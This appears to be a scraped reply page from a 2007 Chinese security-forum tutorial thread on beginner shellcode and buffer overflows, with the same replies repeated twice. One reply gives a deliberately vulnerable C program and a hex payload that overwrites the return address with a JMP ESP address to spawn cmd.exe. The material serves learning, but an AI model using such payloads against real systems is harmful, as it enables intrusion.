[技术专题]软件漏洞分析入门_6_初级shellcode_定位缓冲区-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[技术专题]软件漏洞分析入门_6_初级shellcode_定位缓冲区

2007-12-18 21:23 41808

[技术专题]软件漏洞分析入门_6_初级shellcode_定位缓冲区

failwest

2007-12-18 21:23

41808

查看主题内容

收藏・42

点赞・7

打赏

最新回复 (106) ◀ 1 2 3 4 5 ▶
LULU 雪币： 243 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 24 粉丝 0 关注私信	LULU 2007-12-20 10:30 26 楼 0 呵呵，吱一声，好玩哟
kingwrcy 雪币： 221 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 35 粉丝 0 关注私信	kingwrcy 2007-12-20 11:07 27 楼 0 是如何得到参数的地址的？ 68 77 65 73 74 PUSH 74736577 68 66 61 69 6C PUSH 6C696166 这2个地址应该是"failwest"的地址吧？是如何得到这2个地址的呢？还有cpu如何知道一个参数已经结束？接下来的是第2个参数呢？如果是在参数末尾加\0，那要怎么写汇编代码呢？希望大牛们写个代码让我看看，先行谢过了！期待...
failwest 雪币： 2041 活跃值： (261) 能力值： (RANK：330 ) 在线值：发帖 32 回帖 91 粉丝 42 关注私信	failwest 8 2007-12-20 11:23 28 楼 0 其实 push ebx // cut string push 0x74736577 push 0x6C696166//push failwest 并不是压得参数本身，只是把failwest存入内存，这里为了简单，就直接存到栈里了，当然存任何地方都可以首先记得ESP永远指向栈顶，那么： PUSH ebx 这句就是在栈里放个0，因为EBX已经在前一句清0了，这时ESP指向这个0 top 0 《---esp bottom push 0x74736577 向栈中压入“west”。这时ESP指向“west”，当然后面跟着先前的0，刚好构成字符串 top west 《----esp 0 bottom push 0x6C696166 向栈中压入“fail”。这是ESP指向“fail”，当然后面跟着先前的west和0 top fail 《---esp west 0 bottom 所以这时的ESP值相当于指向字符串failwest的指针，把它保存在EAX里边 are we clear now? 我们最终的参数只是调用前的四次压栈，两次EBX（0），两次EAX（字符串指针）至于函数怎么用这些参数，请你回去精读第3讲中的内容，或者自己写点传参数的例子，亲自动手跟几遍就彻底明白了——这是搞清问题的最有效办法
bzhkl 雪币： 437 活跃值： (253) 能力值： ( LV12，RANK：240 ) 在线值：发帖 44 回帖 399 粉丝 1 关注私信	bzhkl 5 2007-12-20 12:01 29 楼 0 看了楼上的帖子想到一个成语循循善诱~
kingwrcy 雪币： 221 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 35 粉丝 0 关注私信	kingwrcy 2007-12-20 13:11 30 楼 0 多谢老大，弄清楚68 77 65 73 74 PUSH 74736577 68 66 61 69 6C PUSH 6C696166 了，先前一直以为是字符串的地址，原来就是字符串！再次感谢！`
阿南雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 49 粉丝 0 关注私信	阿南 2007-12-20 19:48 31 楼 0 看完这个心里就2个字.......阴险......ESP指向溢出覆盖地址的后面原来是利用堆栈平衡...
wdbxm 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 37 粉丝 0 关注私信	wdbxm 2007-12-20 21:03 32 楼 0 老师下一讲什么时候呢？期待哈~早点端凳子等着
iupek 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 17 粉丝 0 关注私信	iupek 2007-12-20 21:42 33 楼 0 吱——吱——吱
xang 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 8 粉丝 0 关注私信	xang 2007-12-21 00:09 34 楼 0 继续学习中，楼主辛苦
CL_nelson 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	CL_nelson 2007-12-21 14:22 35 楼 0 不错，呵呵，我喜欢，呵呵
htsf110 雪币： 218 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 74 粉丝 0 关注私信	htsf110 2007-12-21 20:29 36 楼 0 出的好慢呀，7什么时候出呀！！等不急了，最好快点出书吧
KuNgBiM 雪币： 817 活跃值： (1927) 能力值： ( LV12，RANK：2670 ) 在线值：发帖 493 回帖 2505 粉丝 20 关注私信	KuNgBiM 66 2007-12-22 03:34 37 楼 0 讲的非常精彩，赞一个
笑熬浆糊雪币： 523 活跃值： (827) 能力值： ( LV6，RANK：90 ) 在线值：发帖 14 回帖 223 粉丝 4 关注私信	笑熬浆糊 2 2007-12-22 15:06 38 楼 0 哇哈哈哈先顶后看
oeptt 雪币： 135 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 35 粉丝 0 关注私信	oeptt 2007-12-22 15:11 39 楼 0 吱——吱——吱
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 703 粉丝 3 关注私信	壹只老虎 7 2007-12-22 20:58 40 楼 0 吱——吱——吱 ============== 提问:"万年不变的jmp esp"可否提供几个!
coolbye 雪币： 243 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 142 粉丝 0 关注私信	coolbye 2007-12-23 00:03 41 楼 0 吱~~~~~~~~~~~~~~~~~~~~~~~~
atylon 雪币： 207 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 122 粉丝 0 关注私信	atylon 2007-12-23 00:47 42 楼 0 吱............................ 看到用jmp esp的说明,有点不明白,可是老大后面的说明并没有用jump esp, 是笔误码吗?
hpxpj 雪币： 243 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 17 回帖 90 粉丝 0 关注私信	hpxpj 1 2007-12-24 14:09 43 楼 0 是啊!昨天晚上我看到一半就熄灯了,回去想了好久也想不出来!今天看了才知道原来是这样来"稳定"啊呵呵
hpxpj 雪币： 243 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 17 回帖 90 粉丝 0 关注私信	hpxpj 1 2007-12-24 14:11 44 楼 0 不是!他是说用这jmp esp指令所在的地址啊
fqucuo 雪币： 31 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 7 回帖 40 粉丝 2 关注私信	fqucuo 4 2007-12-24 14:27 45 楼 0 菜鸟问题：例子中的缓冲区是在子函数中，如果说子函数中没有缓冲区，而是由main函数获得读取字符串并传给子函数的一个字符串指针，里面只是调用了strcmp比较一下，这样的方式有没有什么好的解决办法？
hbfp 雪币： 223 活跃值： (227) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 149 粉丝 1 关注私信	hbfp 2007-12-24 20:29 46 楼 0 学习一下,还好能看明白.
overfgf 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 4 粉丝 0 关注私信	overfgf 2007-12-26 17:30 47 楼 0 学习吱--------吱--------吱
wangxlxk 雪币： 214 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 127 粉丝 0 关注私信	wangxlxk 2007-12-26 19:43 48 楼 0 我想了好久才做出来了一个是简单的返回一个cmd窗口 JMP ESP 是在ntdll里面找到的 7C961EED FFE4 JMP ESP 我在本机测试没有问题（你们看看有没有出错不返回cmd窗口） ----------------------------------------------------------- 测试代码： #include <windows.h> #include <stdio.h> #include <stdlib.h> int fun(char path); int main(int argc, char argv[]) { fun("1.txt"); system("PAUSE"); return 0; } int fun(char path) { char buf[10]; FILE fp = fopen("1.txt","r+"); fscanf(fp,"%s",buf); fclose(fp); puts(buf); return 1; } -------------------------------------------------- 1.txt 文件内容 16进制编辑器复制出来的 Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 00000010 61 61 61 61 61 61 61 61 61 61 61 61 ED 1E 96 7C aaaaaaaaaaaa?東 00000020 55 89 E5 6A 00 68 65 78 65 00 68 63 6D 64 2E 54 U夊j.hexe.hcmd.T 00000030 B8 90 18 40 00 FF D0 5D 笎.@.衇
deletex 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 1 关注私信	deletex 2007-12-27 19:22 49 楼 0 学习了,,,
救世猪雪币： 224 活跃值： (10) 能力值： ( LV5，RANK：60 ) 在线值：发帖 57 回帖 266 粉丝 0 关注私信	救世猪 1 2007-12-27 20:52 50 楼 0 恩，确实不错但是我感觉还是没能及时的消化完是不是这篇文章与第五篇的区别就在于，不用查找缓冲区的地址了？？？但是其他的模块函数的地址仍然要手动查找？
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复

failwest

发帖

回帖

330

RANK

关注

私信

他的文章

[注意]0day第二版补充资料及勘误整理

[下载]《0day安全第二版》随书电子资料发布

关于我们

联系我们

企业服务

看雪公众号

最新回复 (106) ◀ 1 2 3 4 5 ▶
LULU 雪币： 243 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 24 粉丝 0 关注私信	LULU 2007-12-20 10:30 26 楼 0 呵呵，吱一声，好玩哟
kingwrcy 雪币： 221 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 35 粉丝 0 关注私信	kingwrcy 2007-12-20 11:07 27 楼 0 是如何得到参数的地址的？ 68 77 65 73 74 PUSH 74736577 68 66 61 69 6C PUSH 6C696166 这2个地址应该是"failwest"的地址吧？是如何得到这2个地址的呢？还有cpu如何知道一个参数已经结束？接下来的是第2个参数呢？如果是在参数末尾加\0，那要怎么写汇编代码呢？希望大牛们写个代码让我看看，先行谢过了！期待...
failwest 雪币： 2041 活跃值： (261) 能力值： (RANK：330 ) 在线值：发帖 32 回帖 91 粉丝 42 关注私信	failwest 8 2007-12-20 11:23 28 楼 0 其实 push ebx // cut string push 0x74736577 push 0x6C696166//push failwest 并不是压得参数本身，只是把failwest存入内存，这里为了简单，就直接存到栈里了，当然存任何地方都可以首先记得ESP永远指向栈顶，那么： PUSH ebx 这句就是在栈里放个0，因为EBX已经在前一句清0了，这时ESP指向这个0 top 0 《---esp bottom push 0x74736577 向栈中压入“west”。这时ESP指向“west”，当然后面跟着先前的0，刚好构成字符串 top west 《----esp 0 bottom push 0x6C696166 向栈中压入“fail”。这是ESP指向“fail”，当然后面跟着先前的west和0 top fail 《---esp west 0 bottom 所以这时的ESP值相当于指向字符串failwest的指针，把它保存在EAX里边 are we clear now? 我们最终的参数只是调用前的四次压栈，两次EBX（0），两次EAX（字符串指针）至于函数怎么用这些参数，请你回去精读第3讲中的内容，或者自己写点传参数的例子，亲自动手跟几遍就彻底明白了——这是搞清问题的最有效办法
bzhkl 雪币： 437 活跃值： (253) 能力值： ( LV12，RANK：240 ) 在线值：发帖 44 回帖 399 粉丝 1 关注私信	bzhkl 5 2007-12-20 12:01 29 楼 0 看了楼上的帖子想到一个成语循循善诱~
kingwrcy 雪币： 221 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 35 粉丝 0 关注私信	kingwrcy 2007-12-20 13:11 30 楼 0 多谢老大，弄清楚68 77 65 73 74 PUSH 74736577 68 66 61 69 6C PUSH 6C696166 了，先前一直以为是字符串的地址，原来就是字符串！再次感谢！`
阿南雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 49 粉丝 0 关注私信	阿南 2007-12-20 19:48 31 楼 0 看完这个心里就2个字.......阴险......ESP指向溢出覆盖地址的后面原来是利用堆栈平衡...
wdbxm 雪币： 202 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 37 粉丝 0 关注私信	wdbxm 2007-12-20 21:03 32 楼 0 老师下一讲什么时候呢？期待哈~早点端凳子等着
iupek 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 17 粉丝 0 关注私信	iupek 2007-12-20 21:42 33 楼 0 吱——吱——吱
xang 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 8 粉丝 0 关注私信	xang 2007-12-21 00:09 34 楼 0 继续学习中，楼主辛苦
CL_nelson 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	CL_nelson 2007-12-21 14:22 35 楼 0 不错，呵呵，我喜欢，呵呵
htsf110 雪币： 218 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 74 粉丝 0 关注私信	htsf110 2007-12-21 20:29 36 楼 0 出的好慢呀，7什么时候出呀！！等不急了，最好快点出书吧
KuNgBiM 雪币： 817 活跃值： (1927) 能力值： ( LV12，RANK：2670 ) 在线值：发帖 493 回帖 2505 粉丝 20 关注私信	KuNgBiM 66 2007-12-22 03:34 37 楼 0 讲的非常精彩，赞一个
笑熬浆糊雪币： 523 活跃值： (827) 能力值： ( LV6，RANK：90 ) 在线值：发帖 14 回帖 223 粉丝 4 关注私信	笑熬浆糊 2 2007-12-22 15:06 38 楼 0 哇哈哈哈先顶后看
oeptt 雪币： 135 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 35 粉丝 0 关注私信	oeptt 2007-12-22 15:11 39 楼 0 吱——吱——吱
壹只老虎雪币： 112 活跃值： (16) 能力值： ( LV9，RANK：290 ) 在线值：发帖 38 回帖 703 粉丝 3 关注私信	壹只老虎 7 2007-12-22 20:58 40 楼 0 吱——吱——吱 ============== 提问:"万年不变的jmp esp"可否提供几个!
coolbye 雪币： 243 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 142 粉丝 0 关注私信	coolbye 2007-12-23 00:03 41 楼 0 吱~~~~~~~~~~~~~~~~~~~~~~~~
atylon 雪币： 207 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 122 粉丝 0 关注私信	atylon 2007-12-23 00:47 42 楼 0 吱............................ 看到用jmp esp的说明,有点不明白,可是老大后面的说明并没有用jump esp, 是笔误码吗?
hpxpj 雪币： 243 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 17 回帖 90 粉丝 0 关注私信	hpxpj 1 2007-12-24 14:09 43 楼 0 是啊!昨天晚上我看到一半就熄灯了,回去想了好久也想不出来!今天看了才知道原来是这样来"稳定"啊呵呵
hpxpj 雪币： 243 活跃值： (10) 能力值： ( LV4，RANK：50 ) 在线值：发帖 17 回帖 90 粉丝 0 关注私信	hpxpj 1 2007-12-24 14:11 44 楼 0 不是!他是说用这jmp esp指令所在的地址啊
fqucuo 雪币： 31 活跃值： (15) 能力值： ( LV9，RANK：170 ) 在线值：发帖 7 回帖 40 粉丝 2 关注私信	fqucuo 4 2007-12-24 14:27 45 楼 0 菜鸟问题：例子中的缓冲区是在子函数中，如果说子函数中没有缓冲区，而是由main函数获得读取字符串并传给子函数的一个字符串指针，里面只是调用了strcmp比较一下，这样的方式有没有什么好的解决办法？
hbfp 雪币： 223 活跃值： (227) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 149 粉丝 1 关注私信	hbfp 2007-12-24 20:29 46 楼 0 学习一下,还好能看明白.
overfgf 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 4 粉丝 0 关注私信	overfgf 2007-12-26 17:30 47 楼 0 学习吱--------吱--------吱
wangxlxk 雪币： 214 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 12 回帖 127 粉丝 0 关注私信	wangxlxk 2007-12-26 19:43 48 楼 0 我想了好久才做出来了一个是简单的返回一个cmd窗口 JMP ESP 是在ntdll里面找到的 7C961EED FFE4 JMP ESP 我在本机测试没有问题（你们看看有没有出错不返回cmd窗口） ----------------------------------------------------------- 测试代码： #include <windows.h> #include <stdio.h> #include <stdlib.h> int fun(char path); int main(int argc, char argv[]) { fun("1.txt"); system("PAUSE"); return 0; } int fun(char path) { char buf[10]; FILE fp = fopen("1.txt","r+"); fscanf(fp,"%s",buf); fclose(fp); puts(buf); return 1; } -------------------------------------------------- 1.txt 文件内容 16进制编辑器复制出来的 Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F 00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa 00000010 61 61 61 61 61 61 61 61 61 61 61 61 ED 1E 96 7C aaaaaaaaaaaa?東 00000020 55 89 E5 6A 00 68 65 78 65 00 68 63 6D 64 2E 54 U夊j.hexe.hcmd.T 00000030 B8 90 18 40 00 FF D0 5D 笎.@.衇
deletex 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 1 关注私信	deletex 2007-12-27 19:22 49 楼 0 学习了,,,
救世猪雪币： 224 活跃值： (10) 能力值： ( LV5，RANK：60 ) 在线值：发帖 57 回帖 266 粉丝 0 关注私信	救世猪 1 2007-12-27 20:52 50 楼 0 恩，确实不错但是我感觉还是没能及时的消化完是不是这篇文章与第五篇的区别就在于，不用查找缓冲区的地址了？？？但是其他的模块函数的地址仍然要手动查找？
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复